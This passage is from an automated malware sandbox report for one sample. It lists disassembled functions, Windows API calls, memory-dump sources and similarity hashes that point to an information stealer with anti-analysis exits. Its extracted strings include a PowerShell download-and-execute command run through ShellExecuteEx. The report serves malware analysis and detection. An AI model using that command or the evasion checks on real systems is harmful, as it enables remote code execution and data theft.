                                            • InternetCloseHandle.WININET(00000000), ref: 02459D2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID:
                                            • API String ID: 3289985339-0
                                            • Opcode ID: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                            • Instruction ID: 9cfcedfedc3fe0f613ca0b0eb6de1f1f966daf766b864d640c728eb35752a79f
                                            • Opcode Fuzzy Hash: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                            • Instruction Fuzzy Hash: D6415D31A10268EBCB14EB90CD84FEDB775BB48740F50509AF546AA190DBB4AE80CF64
                                            Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __lock.LIBCMT ref: 0041B69A
                                              • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                              • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                              • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                            • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                              • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                            • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 2005412495-0
                                            • Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                            • Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
                                            • Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                            • Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99
                                            Function 02466EF7 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02469E58
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02469E71
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02469E89
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02469EA1
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02469EBA
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02469ED2
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02469EEA
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02469F03
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02469F1B
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02469F33
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02469F4C
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02469F64
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02469F7C
                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02469F95
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02451437: ExitProcess.KERNEL32 ref: 02451478
                                              • Part of subcall function 024513C7: GetSystemInfo.KERNEL32(?), ref: 024513D1
                                              • Part of subcall function 024513C7: ExitProcess.KERNEL32 ref: 024513E5
                                              • Part of subcall function 02451377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02451392
                                              • Part of subcall function 02451377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02451399
                                              • Part of subcall function 02451377: ExitProcess.KERNEL32 ref: 024513AA
                                              • Part of subcall function 02451487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 024514A5
                                              • Part of subcall function 02451487: __aulldiv.LIBCMT ref: 024514BF
                                              • Part of subcall function 02451487: __aulldiv.LIBCMT ref: 024514CD
                                              • Part of subcall function 02451487: ExitProcess.KERNEL32 ref: 024514FB
                                              • Part of subcall function 02466C77: GetUserDefaultLangID.KERNEL32 ref: 02466C7B
                                              • Part of subcall function 024513F7: ExitProcess.KERNEL32 ref: 0245142D
                                              • Part of subcall function 02467C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0245141E), ref: 02467C77
                                              • Part of subcall function 02467C47: RtlAllocateHeap.NTDLL(00000000), ref: 02467C7E
                                              • Part of subcall function 02467C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02467C96
                                              • Part of subcall function 02467CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467D07
                                              • Part of subcall function 02467CD7: RtlAllocateHeap.NTDLL(00000000), ref: 02467D0E
                                              • Part of subcall function 02467CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 02467D26
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02466FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02466FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02467000
                                            • Sleep.KERNEL32(00001770), ref: 0246700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02467021
                                            • ExitProcess.KERNEL32 ref: 02467029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2525456742-0
                                            • Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                            • Instruction ID: ac1aa17582304b1d4e429d501d00f07f59b079ad533f7bca73262a4d70e20325
                                            • Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                            • Instruction Fuzzy Hash: 34314871900624AADB08FBF2DC58BFEB77BAF04304F40052FA552A2090EFB45905CE63
                                            Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                            • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                            • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                            • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                            • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                            • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                            • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                            Function 0245A377 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                            • ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                            • LocalFree.KERNEL32(024516F6), ref: 0245A447
                                            • CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                            • Instruction ID: 74e83bd48c36325b5d6c6e0da9ad1828a3435e0dd5ff8f2ef0f188f07216d288
                                            • Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                            • Instruction Fuzzy Hash: 5F31ED74A00219EFDB14CF94D889BAE77B5FF49704F10825AED11A7390D774AA81CFA1
                                            Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CD1A
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __amsg_exit.LIBCMT ref: 0041CD3A
                                            • __lock.LIBCMT ref: 0041CD4A
                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                            • free.MSVCRT ref: 0041CD7A
                                            • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                            • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                            • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                            • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                            Function 0246CF75 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 0246CF81
                                              • Part of subcall function 0246C507: __getptd_noexit.LIBCMT ref: 0246C50A
                                              • Part of subcall function 0246C507: __amsg_exit.LIBCMT ref: 0246C517
                                            • __amsg_exit.LIBCMT ref: 0246CFA1
                                            • __lock.LIBCMT ref: 0246CFB1
                                            • InterlockedDecrement.KERNEL32(?), ref: 0246CFCE
                                            • free.MSVCRT ref: 0246CFE1
                                            • InterlockedIncrement.KERNEL32(0042C980), ref: 0246CFF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction ID: a936627510a88f38c97d6a994d583d9665089f077a1209e401caa04268c8473f
                                            • Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction Fuzzy Hash: 56015E31A01621EFCB25AB6AD88CB7EB7A1BF08718F04411BE855E76C0C7246941CFD7
                                            Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strlen.MSVCRT ref: 0041719F
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                            • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                              • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                            Function 024673E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strlen.MSVCRT ref: 02467406
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02467681,00000000,00420BB0,00000000,00000000), ref: 02467434
                                              • Part of subcall function 024670B7: strlen.MSVCRT ref: 024670C8
                                              • Part of subcall function 024670B7: strlen.MSVCRT ref: 024670EC
                                            • VirtualQueryEx.KERNEL32(024677F4,00000000,?,0000001C), ref: 02467479
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02467681), ref: 0246759A
                                              • Part of subcall function 024672C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 024672DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: e4935f7195b8e8733ab3982db5eca99059a4e36fee1dde345a1797f77888d2bf
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: F851F5B1E00119EBDB04CF99D985ABFB7B6FF88304F10855AF919A7240D735EA41CBA1
                                            Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: zn@$zn@
                                            • API String ID: 1029625771-1156428846
                                            • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                            • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                            Function 02464C37 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 02464C92
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02464CB8
                                            • lstrcat.KERNEL32(?,?), ref: 02464CD7
                                            • lstrcat.KERNEL32(?,?), ref: 02464CEB
                                            • lstrcat.KERNEL32(?,006D6C84), ref: 02464CFE
                                            • lstrcat.KERNEL32(?,?), ref: 02464D12
                                            • lstrcat.KERNEL32(?,006D6CC8), ref: 02464D26
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02469187: GetFileAttributesA.KERNEL32(00000000,?,02451DFB,?,?,00425784,?,?,00420E22), ref: 02469196
                                              • Part of subcall function 02464A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02464A37
                                              • Part of subcall function 02464A27: RtlAllocateHeap.NTDLL(00000000), ref: 02464A3E
                                              • Part of subcall function 02464A27: wsprintfA.USER32 ref: 02464A5D
                                              • Part of subcall function 02464A27: FindFirstFileA.KERNEL32(?,?), ref: 02464A74
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 2540262943-0
                                            • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction ID: 55f6ad779f5e29749a0cfdd8cc5f0caa71f690b9e6e404e48ce86a3959aad8a0
                                            • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction Fuzzy Hash: EB3123B6E0025867DB14F7B0DC88EE9733AAF58700F44469EB65596090EA7497CC8FA1
                                            Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                            Strings
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                            • ')", xrefs: 00412F03
                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                            • <, xrefs: 00412F89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            • API String ID: 3031569214-898575020
                                            • Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                            • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                            • Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                            • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                            Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                            • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                            • lstrcatA.KERNEL32(?,009C9670), ref: 004151FB
                                            • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID: cA
